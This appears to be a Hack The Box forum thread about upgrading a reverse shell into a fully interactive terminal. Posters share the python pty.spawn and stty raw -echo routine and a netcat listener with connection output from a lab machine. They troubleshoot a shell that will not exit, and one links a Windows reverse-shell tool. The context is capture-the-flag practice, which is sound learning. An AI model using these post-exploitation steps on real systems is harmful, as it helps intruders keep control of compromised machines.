Obtaining a Fully Interactive Shell

2»

Comments

  • Type your comment> @KeyboardCaper said:

    After getting a terminal:

    python -c 'import pty; pty.spawn("/bin/bash")'
    CTRL-z
    bg
    stty raw -echo
    fg
    reset
    (In case of unknown terminal type try: linux)

    Optional:
    export SHELL=/bin/bash
    export TERM=xterm-color
    export HOME=

    Then fix up the rows and columns. Open another terminal
    stty -a

    Get the rows and columns.

    Back on your reverse shell:
    stty rows <> columns <>

    Rarely does the python part not work... when it doesn't I simply find a work around or just deal with what I have.

    Probably good to note for this that python -c 'import pty;pty.spawn("/bin/bash")' won't work with any versions of Python3, so specifying python3 -c ... is necessary. Otherwise solid description, you nailed it to a "T".


    Hack The Box
    defarbs.com - "Let me just quote the late, great Colonel Sanders, who said, 'I'm too drunk... to taste this chicken.'”

  • I have a curious problem with this kind of shell. I'm working with the Kali KDE distribution with the standard Konsole terminal and /bin/bash/.

    I start a reverse shell from another machine.

    On my attacking machine I have netcat listening:
    nc -l -v -p 80

    I get the connection on my host:
    listening on [any] 80 ...
    connect to [10.10.14.2] from craft.htb [10.10.10.110] 40575
    /bin/sh: can't access tty; job control turned off
    /opt/app #

    I do my routine to elevate the shell:
    python -c 'import pty; pty.spawn("/bin/bash")'
    CTRL-z
    stty raw -echo
    fg
    reset

    I have a fully functional shell BUT I can't close it. I'll always have to kill the process. I use exit to leave the shell and end up in a window where I can't enter any commands. At first I thought that it is a problem with zsh (stty raw -echo; fg kind of) but it is the same in /bin/bash and in Xterm instead of Konsole.

    Any Ideas what could go wrong here?

    On a side note, what if I don't have an /bin/bash on the remote machine? Is it possible to get an fully interactive shell?

  • edited September 10

    @timebeyond said:
    I have a fully functional shell BUT I can't close it. I'll always have to kill the process. I use exit to leave the shell and end up in a window where I can't enter any commands. At first I thought that it is a problem with zsh (stty raw -echo; fg kind of) but it is the same in /bin/bash and in Xterm instead of Konsole.

    I actually had this exact same issue when I was working on networked. I had to kill the process, but I am not sure what went wrong.

    On a side note, what if I don't have an /bin/bash on the remote machine? Is it possible to get an fully interactive shell?

    You can use /bin/sh, which is most of the time just a symbolic link to the real active shell.

  • Thanks for the reassurance that my standard setup has no flaws. Just wanted to be sure that the problem isn't between the keyboard and the chair.

  • edited September 19

    If you are looking for a way to get fully interactive shell on Windows i just released a c#/powershell reverse shell that implements the pty console. Here the link --> https://github.com/antonioCoco/ConPtyShell

Sign In to comment.